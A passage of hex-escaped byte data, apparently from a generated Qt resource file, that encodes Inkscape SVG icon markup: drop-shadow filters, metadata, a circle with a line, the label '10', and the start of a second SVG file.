\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\x63\
\x6f\x6d\x70\x6f\x73\x69\x74\x65\x31\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x43\x6f\x6d\x70\x6f\x73\
\x69\x74\x65\x39\x30\x36\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\
\x20\x3c\x66\x65\x47\x61\x75\x73\x73\x69\x61\x6e\x42\x6c\x75\x72\
\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x3d\x22\x63\x6f\
\x6d\x70\x6f\x73\x69\x74\x65\x31\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x73\x74\x64\x44\x65\x76\x69\x61\x74\x69\x6f\x6e\x3d\
\x22\x30\x2e\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\
\x65\x73\x75\x6c\x74\x3d\x22\x62\x6c\x75\x72\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x47\x61\x75\x73\
\x73\x69\x61\x6e\x42\x6c\x75\x72\x39\x30\x38\x22\x20\x2f\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x3c\x66\x65\x4f\x66\x66\x73\x65\x74\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x78\x3d\x22\x30\x2e\x31\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x79\x3d\x22\x30\
\x2e\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\
\x75\x6c\x74\x3d\x22\x6f\x66\x66\x73\x65\x74\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x4f\x66\x66\x73\
\x65\x74\x39\x31\x30\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x3c\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\x74\x65\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x69\x6e\x3d\x22\x53\x6f\x75\x72\x63\x65\
\x47\x72\x61\x70\x68\x69\x63\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x69\x6e\x32\x3d\x22\x6f\x66\x66\x73\x65\x74\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x70\x65\x72\x61\x74\x6f\x72\
\x3d\x22\x6f\x76\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\x63\x6f\x6d\x70\x6f\x73\x69\
\x74\x65\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\x74\x65\x39\x31\x32\
\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x66\x69\x6c\x74\x65\
\x72\x3e\x0a\x20\x20\x20\x20\x3c\x66\x69\x6c\x74\x65\x72\x0a\x20\
\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x63\x6f\x6c\
\x6f\x72\x2d\x69\x6e\x74\x65\x72\x70\x6f\x6c\x61\x74\x69\x6f\x6e\
\x2d\x66\x69\x6c\x74\x65\x72\x73\x3a\x73\x52\x47\x42\x3b\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x6c\x61\x62\x65\x6c\x3d\x22\x44\x72\x6f\x70\x20\x53\x68\x61\x64\
\x6f\x77\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\
\x69\x6c\x74\x65\x72\x39\x33\x38\x22\x3e\x0a\x20\x20\x20\x20\x20\
\x20\x3c\x66\x65\x46\x6c\x6f\x6f\x64\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x66\x6c\x6f\x6f\x64\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3d\x22\x30\x2e\x34\x39\x38\x30\x33\x39\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x66\x6c\x6f\x6f\x64\x2d\x63\x6f\x6c\x6f\x72\
\x3d\x22\x72\x67\x62\x28\x30\x2c\x30\x2c\x30\x29\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\x66\
\x6c\x6f\x6f\x64\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x66\x65\x46\x6c\x6f\x6f\x64\x39\x32\x38\x22\x20\x2f\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x66\x65\x43\x6f\x6d\x70\x6f\
\x73\x69\x74\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\
\x3d\x22\x66\x6c\x6f\x6f\x64\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x69\x6e\x32\x3d\x22\x53\x6f\x75\x72\x63\x65\x47\x72\x61\
\x70\x68\x69\x63\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\
\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x69\x6e\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\x63\x6f\
\x6d\x70\x6f\x73\x69\x74\x65\x31\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\
\x74\x65\x39\x33\x30\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x3c\x66\x65\x47\x61\x75\x73\x73\x69\x61\x6e\x42\x6c\x75\x72\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x3d\x22\x63\x6f\x6d\
\x70\x6f\x73\x69\x74\x65\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x73\x74\x64\x44\x65\x76\x69\x61\x74\x69\x6f\x6e\x3d\x22\
\x30\x2e\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\
\x73\x75\x6c\x74\x3d\x22\x62\x6c\x75\x72\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x47\x61\x75\x73\x73\
\x69\x61\x6e\x42\x6c\x75\x72\x39\x33\x32\x22\x20\x2f\x3e\x0a\x20\
\x20\x20\x20\x20\x20\x3c\x66\x65\x4f\x66\x66\x73\x65\x74\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x64\x78\x3d\x22\x30\x2e\x31\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x79\x3d\x22\x30\x2e\
\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\
\x6c\x74\x3d\x22\x6f\x66\x66\x73\x65\x74\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x66\x65\x4f\x66\x66\x73\x65\
\x74\x39\x33\x34\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\
\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\x74\x65\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x69\x6e\x3d\x22\x53\x6f\x75\x72\x63\x65\x47\
\x72\x61\x70\x68\x69\x63\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x69\x6e\x32\x3d\x22\x6f\x66\x66\x73\x65\x74\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x6f\x70\x65\x72\x61\x74\x6f\x72\x3d\
\x22\x6f\x76\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x72\x65\x73\x75\x6c\x74\x3d\x22\x63\x6f\x6d\x70\x6f\x73\x69\x74\
\x65\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x66\x65\x43\x6f\x6d\x70\x6f\x73\x69\x74\x65\x39\x33\x36\x22\
\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x66\x69\x6c\x74\x65\x72\
\x3e\x0a\x20\x20\x3c\x2f\x64\x65\x66\x73\x3e\x0a\x20\x20\x3c\x6d\
\x65\x74\x61\x64\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x35\x30\x33\x39\x22\x3e\x0a\
\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\
\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\
\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\
\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\
\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\x70\
\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\
\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\
\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\
\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\
\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\
\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\
\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\
\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x6c\x61\x79\x65\x72\x32\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\
\x62\x65\x6e\x65\x20\x32\x22\x3e\x0a\x20\x20\x20\x20\x3c\x70\x61\
\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\
\x22\x66\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\
\x65\x3a\x23\x66\x66\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x77\x69\x64\x74\x68\x3a\x31\x2e\x38\x38\x39\x37\x36\x33\x37\
\x38\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x63\x61\x70\
\x3a\x62\x75\x74\x74\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\
\x65\x6a\x6f\x69\x6e\x3a\x6d\x69\x74\x65\x72\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\
\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x3b\x66\x69\x6c\x74\x65\x72\x3a\x75\x72\
\x6c\x28\x23\x66\x69\x6c\x74\x65\x72\x39\x33\x38\x29\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x6d\x20\x31\x31\x2e\x33\x30\
\x33\x30\x38\x35\x2c\x31\x31\x2e\x31\x35\x34\x37\x35\x36\x20\x33\
\x2e\x38\x33\x38\x38\x33\x2c\x33\x2e\x39\x31\x30\x34\x38\x38\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\
\x35\x36\x31\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x63\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\
\x63\x75\x72\x76\x61\x74\x75\x72\x65\x3d\x22\x30\x22\x20\x2f\x3e\
\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\
\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\
\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\
\x20\x3c\x63\x69\x72\x63\x6c\x65\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x61\x66\x63\
\x36\x65\x39\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\
\x3a\x30\x2e\x37\x38\x34\x31\x37\x32\x36\x33\x3b\x73\x74\x72\x6f\
\x6b\x65\x3a\x23\x66\x66\x30\x30\x30\x30\x3b\x73\x74\x72\x6f\x6b\
\x65\x2d\x77\x69\x64\x74\x68\x3a\x31\x2e\x31\x39\x30\x39\x33\x39\
\x34\x33\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\
\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\
\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\
\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x66\x69\
\x6c\x74\x65\x72\x3a\x75\x72\x6c\x28\x23\x66\x69\x6c\x74\x65\x72\
\x39\x31\x34\x29\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x70\x61\x74\x68\x35\x36\x30\x35\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x63\x78\x3d\x22\x36\x2e\x38\x34\x37\x35\x30\x33\x37\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x63\x79\x3d\x22\x36\x2e\x38\x36\
\x30\x30\x30\x32\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x72\x3d\
\x22\x36\x2e\x30\x34\x31\x32\x34\x33\x31\x22\x20\x2f\x3e\x0a\x20\
\x20\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x20\x20\x61\x72\x69\
\x61\x2d\x6c\x61\x62\x65\x6c\x3d\x22\x31\x30\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x6f\x6e\x74\x2d\
\x73\x74\x79\x6c\x65\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\
\x74\x2d\x76\x61\x72\x69\x61\x6e\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\
\x3b\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\x74\x3a\x39\x30\x30\
\x3b\x66\x6f\x6e\x74\x2d\x73\x74\x72\x65\x74\x63\x68\x3a\x6e\x6f\
\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x31\
\x30\x2e\x36\x36\x36\x36\x36\x36\x39\x38\x70\x78\x3b\x6c\x69\x6e\
\x65\x2d\x68\x65\x69\x67\x68\x74\x3a\x31\x2e\x32\x35\x3b\x66\x6f\
\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\x3a\x27\x53\x6f\x75\x72\x63\
\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\x27\x3b\x2d\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2d\x66\x6f\x6e\x74\x2d\x73\x70\x65\x63\x69\
\x66\x69\x63\x61\x74\x69\x6f\x6e\x3a\x27\x53\x6f\x75\x72\x63\x65\
\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\x20\x48\x65\x61\x76\x79\x27\
\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\x70\x61\x63\x69\x6e\x67\x3a\
\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\x73\x70\x61\x63\x69\x6e\x67\
\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\x3a\x23\x30\x30\x30\x30\x30\
\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\
\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\x65\x22\x0a\x20\x20\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x65\x78\x74\x35\x35\x39\
\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\
\x6f\x72\x6d\x3d\x22\x6d\x61\x74\x72\x69\x78\x28\x30\x2e\x37\x36\
\x34\x33\x30\x36\x37\x2c\x30\x2c\x30\x2c\x30\x2e\x38\x35\x31\x36\
\x32\x38\x39\x36\x2c\x30\x2e\x36\x35\x34\x32\x32\x37\x38\x37\x2c\
\x30\x2e\x30\x32\x30\x33\x35\x35\x33\x32\x29\x22\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x64\x3d\x22\x4d\x20\x32\x2e\x34\x39\x38\x31\x36\x36\
\x37\x2c\x31\x31\x2e\x31\x38\x37\x35\x20\x48\x20\x37\x2e\x34\x34\
\x37\x35\x30\x30\x32\x20\x56\x20\x39\x2e\x37\x31\x35\x35\x20\x48\
\x20\x35\x2e\x39\x39\x36\x38\x33\x33\x35\x20\x56\x20\x34\x2e\x34\
\x32\x34\x38\x33\x33\x31\x20\x48\x20\x34\x2e\x36\x35\x32\x38\x33\
\x33\x34\x20\x63\x20\x2d\x30\x2e\x35\x33\x33\x33\x33\x33\x33\x2c\
\x30\x2e\x33\x32\x20\x2d\x31\x2e\x30\x36\x36\x36\x36\x36\x37\x2c\
\x30\x2e\x35\x31\x32\x20\x2d\x31\x2e\x38\x37\x37\x33\x33\x33\x34\
\x2c\x30\x2e\x36\x36\x31\x33\x33\x33\x34\x20\x56\x20\x36\x2e\x32\
\x31\x36\x38\x33\x33\x32\x20\x48\x20\x34\x2e\x31\x36\x32\x31\x36\
\x36\x37\x20\x56\x20\x39\x2e\x37\x31\x35\x35\x20\x68\x20\x2d\x31\
\x2e\x36\x36\x34\x20\x7a\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x37\x31\x31\x37\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x63\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\x63\x75\x72\x76\x61\
\x74\x75\x72\x65\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x30\
\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\
\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x3d\
\x22\x6d\x20\x31\x31\x2e\x32\x38\x33\x33\x33\x34\x2c\x31\x31\x2e\
\x33\x31\x35\x35\x20\x63\x20\x31\x2e\x35\x38\x39\x33\x33\x33\x2c\
\x30\x20\x32\x2e\x36\x36\x36\x36\x36\x36\x2c\x2d\x31\x2e\x32\x32\
\x36\x36\x36\x37\x20\x32\x2e\x36\x36\x36\x36\x36\x36\x2c\x2d\x33\
\x2e\x35\x34\x31\x33\x33\x33\x34\x20\x30\x2c\x2d\x32\x2e\x33\x31\
\x34\x36\x36\x36\x38\x20\x2d\x31\x2e\x30\x37\x37\x33\x33\x33\x2c\
\x2d\x33\x2e\x34\x37\x37\x33\x33\x33\x35\x20\x2d\x32\x2e\x36\x36\
\x36\x36\x36\x36\x2c\x2d\x33\x2e\x34\x37\x37\x33\x33\x33\x35\x20\
\x2d\x31\x2e\x35\x38\x39\x33\x33\x33\x38\x2c\x30\x20\x2d\x32\x2e\
\x36\x36\x36\x36\x36\x37\x32\x2c\x31\x2e\x31\x36\x32\x36\x36\x36\
\x37\x20\x2d\x32\x2e\x36\x36\x36\x36\x36\x37\x32\x2c\x33\x2e\x34\
\x37\x37\x33\x33\x33\x35\x20\x30\x2c\x32\x2e\x33\x31\x34\x36\x36\
\x36\x34\x20\x31\x2e\x30\x37\x37\x33\x33\x33\x34\x2c\x33\x2e\x35\
\x34\x31\x33\x33\x33\x34\x20\x32\x2e\x36\x36\x36\x36\x36\x37\x32\
\x2c\x33\x2e\x35\x34\x31\x33\x33\x33\x34\x20\x7a\x20\x6d\x20\x30\
\x2c\x2d\x31\x2e\x34\x30\x38\x20\x43\x20\x31\x30\x2e\x37\x31\x38\
\x2c\x39\x2e\x39\x30\x37\x35\x20\x31\x30\x2e\x32\x33\x38\x2c\x39\
\x2e\x34\x35\x39\x34\x39\x39\x39\x20\x31\x30\x2e\x32\x33\x38\x2c\
\x37\x2e\x37\x37\x34\x31\x36\x36\x36\x20\x63\x20\x30\x2c\x2d\x31\
\x2e\x36\x38\x35\x33\x33\x33\x34\x20\x30\x2e\x34\x38\x2c\x2d\x32\
\x2e\x30\x36\x39\x33\x33\x33\x34\x20\x31\x2e\x30\x34\x35\x33\x33\
\x34\x2c\x2d\x32\x2e\x30\x36\x39\x33\x33\x33\x34\x20\x30\x2e\x35\
\x36\x35\x33\x33\x33\x2c\x30\x20\x31\x2e\x30\x34\x35\x33\x33\x33\
\x2c\x30\x2e\x33\x38\x34\x20\x31\x2e\x30\x34\x35\x33\x33\x33\x2c\
\x32\x2e\x30\x36\x39\x33\x33\x33\x34\x20\x30\x2c\x31\x2e\x36\x38\
\x35\x33\x33\x33\x33\x20\x2d\x30\x2e\x34\x38\x2c\x32\x2e\x31\x33\
\x33\x33\x33\x33\x34\x20\x2d\x31\x2e\x30\x34\x35\x33\x33\x33\x2c\
\x32\x2e\x31\x33\x33\x33\x33\x33\x34\x20\x7a\x20\x6d\x20\x30\x2c\
\x2d\x31\x2e\x32\x38\x30\x30\x30\x30\x31\x20\x63\x20\x30\x2e\x34\
\x39\x30\x36\x36\x36\x2c\x30\x20\x30\x2e\x38\x35\x33\x33\x33\x33\
\x2c\x2d\x30\x2e\x33\x34\x31\x33\x33\x33\x33\x20\x30\x2e\x38\x35\
\x33\x33\x33\x33\x2c\x2d\x30\x2e\x38\x35\x33\x33\x33\x33\x33\x20\
\x30\x2c\x2d\x30\x2e\x35\x31\x32\x30\x30\x30\x31\x20\x2d\x30\x2e\
\x33\x36\x32\x36\x36\x37\x2c\x2d\x30\x2e\x38\x35\x33\x33\x33\x33\
\x34\x20\x2d\x30\x2e\x38\x35\x33\x33\x33\x33\x2c\x2d\x30\x2e\x38\
\x35\x33\x33\x33\x33\x34\x20\x2d\x30\x2e\x34\x39\x30\x36\x36\x37\
\x2c\x30\x20\x2d\x30\x2e\x38\x35\x33\x33\x33\x34\x2c\x30\x2e\x33\
\x34\x31\x33\x33\x33\x33\x20\x2d\x30\x2e\x38\x35\x33\x33\x33\x34\
\x2c\x30\x2e\x38\x35\x33\x33\x33\x33\x34\x20\x30\x2c\x30\x2e\x35\
\x31\x32\x20\x30\x2e\x33\x36\x32\x36\x36\x37\x2c\x30\x2e\x38\x35\
\x33\x33\x33\x33\x33\x20\x30\x2e\x38\x35\x33\x33\x33\x34\x2c\x30\
\x2e\x38\x35\x33\x33\x33\x33\x33\x20\x7a\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x37\x31\x31\
\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x63\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\x63\
\x75\x72\x76\x61\x74\x75\x72\x65\x3d\x22\x30\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\
\x6c\x3a\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\
\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x3c\x2f\x67\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\
\x76\x67\x3e\x0a\
\x00\x00\x09\x12\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x6d\x6d\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x38\
\x6d\x6d\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\
\x30\x20\x30\x20\x31\x36\x20\x38\x22\x0a\x20\x20\x20\x76\x65\x72\
\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\x69\x64\
